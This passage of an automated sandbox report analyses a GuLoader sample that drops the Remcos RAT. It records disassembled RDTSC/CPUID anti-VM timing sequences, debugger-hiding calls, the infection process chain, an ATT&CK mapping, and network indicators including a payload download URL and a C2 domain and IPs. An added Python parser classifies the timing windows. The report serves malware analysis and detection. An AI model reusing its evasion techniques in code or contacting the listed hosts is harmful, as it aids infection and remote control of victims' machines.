            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 000000000056379A second address: 000000000056383C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov eax, dword ptr fs:[00000030h] 0x00000009 cmp bl, al 0x0000000b mov eax, dword ptr [eax+0Ch] 0x0000000e mov eax, dword ptr [eax+0Ch] 0x00000011 test cl, cl 0x00000013 test bl, cl 0x00000015 test edx, 7C659410h 0x0000001b mov ecx, dword ptr [edi+00000808h] 0x00000021 jmp 00007F430C801710h 0x00000023 mov dword ptr [eax+20h], ecx 0x00000026 mov esi, dword ptr [edi+00000800h] 0x0000002c mov dword ptr [eax+18h], esi 0x0000002f add esi, dword ptr [edi+00000850h] 0x00000035 mov dword ptr [eax+1Ch], esi 0x00000038 cmp dword ptr [ebp+70h], 01h 0x0000003c je 00007F430C8019DCh 0x00000042 jmp 00007F430C8016E6h 0x00000044 cmp edi, A946FD75h 0x0000004a pushad 0x0000004b mov edi, 000000E1h 0x00000050 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000563B90 second address: 0000000000563B90 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor byte ptr [esi+ecx], 00000011h 0x0000000f add byte ptr [esi+ecx], FFFFFF86h 0x00000013 sub byte ptr [esi+ecx], FFFFFFF1h 0x00000017 cmp ecx, 00000000h 0x0000001a jne 00007F430C37BADAh 0x0000001c test dx, ax 0x0000001f dec ecx 0x00000020 mov byte ptr [esi+ecx], 0000007Ah 0x00000024 pushad 0x00000025 lfence 0x00000028 rdtsc
            Source: C:\Windows\SysWOW64\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0816 rdtsc
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Roaming\win.exeWindow / User API: threadDelayed 580
            Source: C:\Users\user\AppData\Roaming\win.exe TID: 6324Thread sleep count: 580 > 30
            Source: C:\Users\user\AppData\Roaming\win.exe TID: 6324Thread sleep time: -5800000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\win.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\win.exeLast function: Thread delayed
            Source: win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462534085.000000000084E000.00000004.00000020.sdmp, win.exe, 00000016.00000002.670720058.00000000008D7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
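The "RDTSC instruction interceptor" entries above are the raw evidence behind the report's RDTSC and CPUID verdicts: each one records two rdtsc sites and the instruction stream executed between them, which is the window whose duration the sample measures. The parser below is an added example, not part of the Joe Sandbox report or of the sample's code. It reads lines in the report's own format, splits the instruction stream, and labels what sits inside each timing window. The four entry strings are copied from this report; the feature names, thresholds and verdict strings are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed input: four "RDTSC instruction interceptor" entries copied from this
# report (the second one has no captured instruction stream, as on the page).
REPORT_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc",
    r"Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:",
    r"Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 000000000056379A second address: 000000000056383C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov eax, dword ptr fs:[00000030h] 0x00000009 cmp bl, al 0x0000000b mov eax, dword ptr [eax+0Ch] 0x0000000e mov eax, dword ptr [eax+0Ch] 0x00000011 test cl, cl 0x00000013 test bl, cl 0x00000015 test edx, 7C659410h 0x0000001b mov ecx, dword ptr [edi+00000808h] 0x00000021 jmp 00007F430C801710h 0x00000023 mov dword ptr [eax+20h], ecx 0x00000026 mov esi, dword ptr [edi+00000800h] 0x0000002c mov dword ptr [eax+18h], esi 0x0000002f add esi, dword ptr [edi+00000850h] 0x00000035 mov dword ptr [eax+1Ch], esi 0x00000038 cmp dword ptr [ebp+70h], 01h 0x0000003c je 00007F430C8019DCh 0x00000042 jmp 00007F430C8016E6h 0x00000044 cmp edi, A946FD75h 0x0000004a pushad 0x0000004b mov edi, 000000E1h 0x00000050 rdtsc",
    r"Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000563B90 second address: 0000000000563B90 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor byte ptr [esi+ecx], 00000011h 0x0000000f add byte ptr [esi+ecx], FFFFFF86h 0x00000013 sub byte ptr [esi+ecx], FFFFFFF1h 0x00000017 cmp ecx, 00000000h 0x0000001a jne 00007F430C37BADAh 0x0000001c test dx, ax 0x0000001f dec ecx 0x00000020 mov byte ptr [esi+ecx], 0000007Ah 0x00000024 pushad 0x00000025 lfence 0x00000028 rdtsc",
]

LINE_RE = re.compile(
    r"Source:\s*(?P<src>.*?)RDTSC instruction interceptor: "
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions:(?P<body>.*)$"
)
# One instruction per "0x<offset> <text>" token; the lookahead stops at the next offset.
INSN_RE = re.compile(r"0x[0-9a-f]{8}\s+(.*?)(?=\s+0x[0-9a-f]{8}\s|\s*$)")


@dataclass
class RdtscPair:
    source: str
    first: int
    second: int
    insns: List[str]

    @property
    def mnemonics(self) -> List[str]:
        return [i.split()[0] for i in self.insns]

    def features(self) -> Dict[str, object]:
        m = self.mnemonics
        text = " ".join(self.insns)
        return {
            "count": len(m),
            "span": self.second - self.first,        # bytes between the two rdtsc sites
            "cpuid": "cpuid" in m,                   # CPUID inside the window: VM-exit timing
            "serialized": "lfence" in m,             # lfence + shl/or: serialized 64-bit TSC read
            "peb_read": "fs:[00000030h]" in text,    # PEB pointer read from the x86 TEB
            # share of test/cmp whose results are never used: the "dummy" filler
            "filler_ratio": round(sum(x in ("test", "cmp") for x in m) / max(len(m), 1), 2),
        }

    def classify(self) -> str:
        f = self.features()
        if f["count"] == 0:
            return "no instruction stream captured"
        if f["cpuid"]:
            return "CPUID execution-time measurement (hardware virtualization check)"
        if f["peb_read"]:
            return "RDTSC-timed PEB/loader-data access"
        return "RDTSC timing window around filler code (dummy instruction sequence)"


def parse_report(lines: List[str]) -> List[RdtscPair]:
    pairs = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        insns = [x.group(1).strip() for x in INSN_RE.finditer(m.group("body"))]
        pairs.append(RdtscPair(m.group("src"), int(m.group("first"), 16),
                               int(m.group("second"), 16), insns))
    return pairs


def summarize(lines: List[str]) -> List[Dict[str, object]]:
    return [{"first": f"{p.first:08X}", "second": f"{p.second:08X}",
             **p.features(), "verdict": p.classify()} for p in parse_report(lines)]


if __name__ == "__main__":
    for row in summarize(REPORT_LINES):
        print(row)
```

The third entry is worth a closer look than the parser's label gives it: it reads fs:[30h] (the PEB), then +0Ch (Ldr) and +0Ch again (the head of InLoadOrderModuleList), and writes offsets 18h, 1Ch and 20h of that entry from values held at [edi+800h] and [edi+850h]. In the 32-bit LDR_DATA_TABLE_ENTRY those offsets are DllBase, EntryPoint and SizeOfImage, so this looks like the loader rewriting its own module entry to match the image it has unpacked. That reading is the editor's interpretation, not a statement made by the report.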

            Anti Debugging:

Hides threads from debuggers
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0816 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5B95 LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B7C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B7C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A7C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B7C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00563B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00567C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00563774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00563B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00563B60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568C44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00567C70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568C6D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056813E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00563774 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00563B6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00562F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmpBinary or memory string: Program Manager
            Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmpBinary or memory string: Program Manager Started
            Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmpBinary or memory string: Program Managerer ]
            Source: logs.dat.23.drBinary or memory string: [ Program Manager ]
            Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmpBinary or memory string: Program Manager&Hmg
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9FF7 cpuid
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387 VolumeInformation
            Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\c20d61befcda487dbc17044b70fd3bfd_1 VolumeInformation
            Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\d572bee68d954d8f906b98a2e017f820_1 VolumeInformation
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

Yara detected Remcos RAT
            Source: Yara matchFile source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: win.exe PID: 2796, type: MEMORY

            Remote Access Functionality:

Yara detected Remcos RAT
            Source: Yara matchFile source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: win.exe PID: 2796, type: MEMORY

MITRE ATT&CK Matrix

Techniques carrying a bracketed figure are the ones matched in this analysis; the figure is the badge attached to that technique in the original matrix.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting [11] | Registry Run Keys / Startup Folder [1] | Process Injection [12] | Masquerading [11] | OS Credential Dumping | Query Registry [1] | Remote Services | Archive Collected Data [1] | Exfiltration Over Other Network Medium | Encrypted Channel [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder [1] | Virtualization/Sandbox Evasion [23] | LSASS Memory | Security Software Discovery [631] | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer [2] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection [12] | Security Account Manager | Virtualization/Sandbox Evasion [23] | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol [2] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting [11] | NTDS | Process Discovery [1] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol [112] | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information [1] | LSA Secrets | Application Window Discovery [1] | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Remote System Discovery [1] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery [1] | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery [322] | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

            Behavior Graph

Behavior Graph ID: 430707 • Sample: SecuriteInfo.com.Trojan.Gen... • Startdate: 07/06/2021 • Architecture: WINDOWS • Score: 96

Signatures on the start node: Found malware configuration; Yara detected GuLoader; Yara detected Remcos RAT; 3 other signatures

Process tree (node numbers as in the graph):

• [10] SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe (started from the start node)
    signatures: Contains functionality to detect hardware virtualization (CPUID execution measurement); Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; Tries to detect virtualization through RDTSC time measurements
    • [17] SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
        network: ztechinternational.com 192.185.113.219, 49732, 49753, 49754, UNIFIEDLAYER-AS-1US United States
        dropped: C:\Users\user\AppData\Roaming\win.exe (PE32); C:\Users\user\...\win.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\install.vbs (data)
        signatures: Tries to detect Any.run; Hides threads from debuggers
        • [28] wscript.exe
            • [30] cmd.exe
                • [32] win.exe
                    signatures: Contains functionality to detect hardware virtualization (CPUID execution measurement); Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; 2 other signatures
                    • [37] win.exe
                        network: ztechinternational.com; hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu 172.94.125.152, 2024, M247GB United States; 192.168.2.1 unknown unknown
                        signatures: Tries to detect Any.run; Hides threads from debuggers
                • [35] conhost.exe
    • [22] backgroundTaskHost.exe
• [13] win.exe (started from the start node)
    signatures: Hides threads from debuggers
    • [24] win.exe
• [15] win.exe (started from the start node)
    • [26] win.exe

            Screenshots


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label
SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe | 6% | ReversingLabs | Win32.Trojan.Vebzenpak

            Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\win.exe | 6% | ReversingLabs | Win32.Trojan.Vebzenpak

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

Source | Detection | Scanner | Label
http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | 172.94.125.152 | true | false | | unknown
ztechinternational.com | 192.185.113.219 | true | true | | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin | true | Avira URL Cloud: safe | unknown

                Contacted IPs


                Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.113.219 | ztechinternational.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
172.94.125.152 | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | United States | 9009 | M247GB | false

                Private

                IP
                192.168.2.1
